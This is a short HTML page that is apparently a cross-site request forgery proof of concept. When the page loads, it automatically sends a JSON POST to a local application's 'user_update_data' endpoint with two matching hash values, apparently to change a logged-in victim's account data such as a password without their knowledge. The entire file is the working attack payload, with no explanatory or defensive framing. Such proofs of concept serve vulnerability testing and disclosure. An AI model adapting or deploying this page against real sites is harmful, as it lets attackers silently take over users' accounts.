<!DOCTYPE html>
<html>
<script src="https://cdn.staticfile.org/jquery/1.10.2/jquery.min.js"></script>
<script type="text/javascript">
        window.onload=function(){
                $.ajax({
                        url:"http://127.0.0.1/myapp/user_update_data",
                        type:"POST",
                        data:'{"value1":"81dc9bdb52d04dc20036dbd8313ed055","value2":"81dc9bdb52d04dc20036dbd8313ed055"}',
                        contentType:"application/json"
                });
        }
</script>
</html>
